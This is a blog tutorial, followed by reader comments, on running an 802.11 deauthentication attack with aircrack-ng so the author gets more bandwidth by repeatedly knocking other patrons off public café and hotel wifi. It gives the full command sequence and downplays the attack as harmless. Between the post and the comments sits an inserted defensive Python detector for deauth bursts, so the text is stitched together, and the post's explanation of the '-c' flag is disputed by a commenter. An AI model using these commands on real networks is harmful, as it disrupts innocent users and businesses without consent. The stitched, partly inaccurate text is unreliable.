Do you ever connect to the free wifi at your local tea lounge and get assigned an address like 192.168.1.148? Are those 47 other users sucking up all the bandwidth, preventing you from reading that webpage or checking your email for that important message? Has the wireless AP simply crashed under all the load of those hippie Mac users continuously reading LOLcats for no good reason?
This happens to me every so often and I use a simple, harmless, and effective technique to deal with it called an 802.11 deauthentication attack. I use aircrack-ng (available on a BackTrack live CD) to temporarily knock everyone off the AP to unclog its pipes and allow you to reach the internets. This blog post will walk you through how to do this yourself if you’re ever stuck in the same situation.
First, boot up to BackTrack if you don’t already have aircrack-ng installed and configured.
Second, you need to configure your wireless card for passive monitoring. I have an Atheros card and I do it like this. If you have a different card, the interface names may be different.
# airmon-ng stop ath0
# airmon-ng start wifi0
Third, you need to sniff for the target AP’s MAC address and channel. Once you see your target AP come up in the airodump-ng list, press CTRL+C to stop airodump-ng and open a new window so you can keep this one for reference.
# airodump-ng ath0
[CTRL+C] -- save this window!
Fourth, you need to set your card to listen on the same channel as your target. Here, my target is on channel 9.
# airmon-ng stop ath0
# airmon-ng start wifi0 9
Fifth and last, you feed the information you’ve gathered to aireplay-ng to construct fake deauthentication packets. This will temporarily knock everyone off the target AP, hopefully unclogging its pipes and allowing you to reach the internets.
# aireplay -0 50 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
- -0 is for a deauth attack
- 50 is for the number of times to repeat the attack
- -a is for the access point MAC address
- -c is for your MAC address (you can find it with ‘iwconfig’)
- ath0 is for the interface previously configured with airmon-ng
Once the attack ends (after 50 packets) or you CTRL+C it, everyone will be able to join the AP again, so quickly reboot and connect as normal.
This solves 99% of my coffee shop/hotel wifi problems. I hope it works for you!
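From the defender's side, a burst of deauthentication frames like the one described above is visible to any monitor-mode sensor. The following is an added example, not code from the original post: it parses raw 802.11 management headers and flags deauth bursts per BSSID/destination pair. The threshold, window, function names and sample frames are assumptions constructed for illustration.

```python
import struct
from collections import defaultdict, deque

DEAUTH_FC0 = 0xC0  # frame-control byte 0: version 0, type 0 (management), subtype 12

def _mac(raw):
    return ":".join(f"{b:02X}" for b in raw)

def parse_deauth(frame):
    """Return (dst, src, bssid, reason) for an 802.11 deauth frame, else None."""
    if len(frame) < 26 or frame[0] != DEAUTH_FC0:
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)  # body follows the 24-byte header
    return _mac(frame[4:10]), _mac(frame[10:16]), _mac(frame[16:22]), reason

def detect_floods(capture, threshold=10, window=5.0):
    """capture: time-ordered (timestamp_s, raw_frame) pairs, radiotap already stripped.
    Returns one (bssid, dst, first_ts, count) alert per (bssid, dst) pair that
    receives `threshold` or more deauth frames within `window` seconds."""
    recent, alerted, alerts = defaultdict(deque), set(), []
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        dst, _src, bssid, _reason = parsed
        q = recent[(bssid, dst)]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and (bssid, dst) not in alerted:
            alerted.add((bssid, dst))
            alerts.append((bssid, dst, q[0], len(q)))
    return alerts

def build_frame(fc0, dst, src, bssid, reason=7, seq=0):
    """Construct a bare management frame for the sample data below (not a capture)."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return (bytes([fc0, 0]) + b"\x00\x00" + raw(dst) + raw(src) + raw(bssid)
            + struct.pack("<HH", seq << 4, reason))

# Constructed sample: the AP and client MACs are the ones in the post's command line;
# the 02:... addresses and all timings are invented for illustration.
AP, CLIENT = "00:14:6C:7E:40:80", "00:0F:B5:34:30:30"
OTHER_AP, OTHER_STA = "02:00:00:00:00:01", "02:00:00:00:00:02"
SAMPLE = sorted(
    [(i * 0.1, build_frame(DEAUTH_FC0, CLIENT, AP, AP, seq=i)) for i in range(50)]
    + [(1.05, build_frame(DEAUTH_FC0, OTHER_STA, OTHER_AP, OTHER_AP, reason=3)),
       (2.05, build_frame(0x80, "FF:FF:FF:FF:FF:FF", AP, AP))],  # 0x80 = beacon, filler body
    key=lambda item: item[0])

if __name__ == "__main__":
    for alert in detect_floods(SAMPLE):
        print("deauth burst: bssid=%s dst=%s first_ts=%.1f count=%d" % alert)
```

A single deauth frame is normal network behaviour, which is why the detector keys on rate rather than presence. Where the AP and clients negotiate 802.11w Protected Management Frames, clients discard unauthenticated deauth frames, so this kind of monitoring matters most on networks without it.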

This seems a bit asinine, to think that your desire to check your email should take priority over the less technologically advanced patrons of the public wifi spot. If I were the owner of the business you do this to, I’d be fairly upset when / if I discovered you are actively blocking or resetting other guests’ connection to the web I provide for them to use.
Using a deauthentication attack only kicks off clients for an instant, not permanently, and it is extremely effective at resolving problems with overloaded APs.
Don’t misinterpret my pathetic attempts at comic relief with being malevolent.
I *never* connect to unsecured wireless networks anymore. Not after hearing about all the fun and profit you can have with tools such as KARMA.
Can’t wait for a nationwide rollout of 4G cell networks which implement at least a basic form of authentication / encryption.
I was wondering… did you put your own MAC address in the example? (-c 00:0F:B5:34:30:30 ath0)
For security reasons you should write 00:11:22:33:44:55… anyway… And second question: doesn't this attack disconnect your own interface from the AP and reconnect it again the number of times that you want (you chose 50 times), to capture more packets due to the traffic generation? Maybe… and I'm just speculating, you should have made the attack to the broadcast address (ff:ff:ff:ff:ff:ff) so everyone gets disconnected from the AP?
Sorry if I made mistakes in my poor English